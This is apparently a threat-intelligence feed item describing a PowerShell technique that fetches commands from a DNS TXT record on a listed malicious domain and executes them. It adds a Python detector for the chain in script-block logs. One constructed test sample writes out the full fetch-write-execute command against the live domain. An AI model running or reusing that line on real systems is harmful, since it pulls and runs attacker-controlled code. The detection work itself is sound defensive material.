Malware · Apr 29, 2026

That PS code will get the TXT DNS record of sagi.chatcamic[.]com, write the content to a file and...

PowerShell script retrieves TXT DNS record from malicious domain and executes downloaded content.

Summary

A PowerShell-based attack vector uses DNS TXT records as a command-and-control mechanism to fetch and execute arbitrary code from the domain sagi.chatcamic[.]com. The technique leverages DNS queries to retrieve instructions, writing them to a file before execution—a method commonly used in fileless malware and living-off-the-land attacks to evade detection.

Indicators of Compromise

  • domain — sagi.chatcamic[.]com
  • malware — PowerShell DNS TXT record execution
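As an added example (not code from this feed item or from the original sample), the sketch below checks PowerShell script-block text, such as Event ID 4104 records, for the three stages the summary describes and compares the looked-up names with the listed domain. The command names in the patterns and both sample script blocks are assumptions constructed here; the page does not show the actual script.

```python
import re

# IoC from the page, kept defanged in source and refanged only for comparison.
IOC = "sagi.chatcamic[.]com".replace("[.]", ".")
WATCHLIST = {IOC}

# Assumption: the page does not name the commands the script used. These are
# common PowerShell/Windows ways to do each stage, not the sample's actual code.
STAGES = {
    "dns_txt": re.compile(r"\bResolve-DnsName\b[^|;\n]*\bTXT\b"
                          r"|\bnslookup\b[^|;\n]*-(?:type|q|querytype)=txt\b", re.I),
    "file_write": re.compile(r"\b(?:Out-File|Set-Content|Add-Content|WriteAllText)\b", re.I),
    "execute": re.compile(r"\b(?:Invoke-Expression|iex|Start-Process)\b"
                          r"|\bpowershell(?:\.exe)?\s+-(?:f|file)\b", re.I),
}
HOST = re.compile(r"(?<![\w$.-])(?:[a-z0-9_-]+\.)+[a-z]{2,}", re.I)


def analyze(script_block: str) -> dict:
    """Report which stages of the DNS TXT -> file -> execute chain appear."""
    stages = [name for name, rx in STAGES.items() if rx.search(script_block)]
    domains = set()
    # Only pull hostnames from the statement that performs the TXT lookup,
    # so file names such as stage.ps1 are not mistaken for domains.
    for statement in re.split(r"[|;\n]", script_block):
        if STAGES["dns_txt"].search(statement):
            domains.update(h.lower() for h in HOST.findall(statement))
    return {
        "stages": stages,
        "domains": sorted(domains),
        "full_chain": len(stages) == len(STAGES),
        "ioc_hit": bool(domains & WATCHLIST),
    }


# Constructed script-block texts (not captured from a real host).
SAMPLES = {
    "admin_dmarc_check": "Resolve-DnsName -Type TXT -Name _dmarc.corp.example | Format-List",
    "txt_to_file_to_exec": rf"$t = (Resolve-DnsName -Type TXT -Name {IOC}).Strings; "
                           r"Set-Content -Path $env:TEMP\stage.ps1 -Value $t; "
                           r"powershell -File $env:TEMP\stage.ps1",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, analyze(text))
```

A full-chain match on a name outside the watchlist is still worth triage, since a TXT lookup alone is routine administration but the lookup followed by a file write and execution is not.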

Entities

  • PowerShell (technology)
  • DNS TXT Records (technology)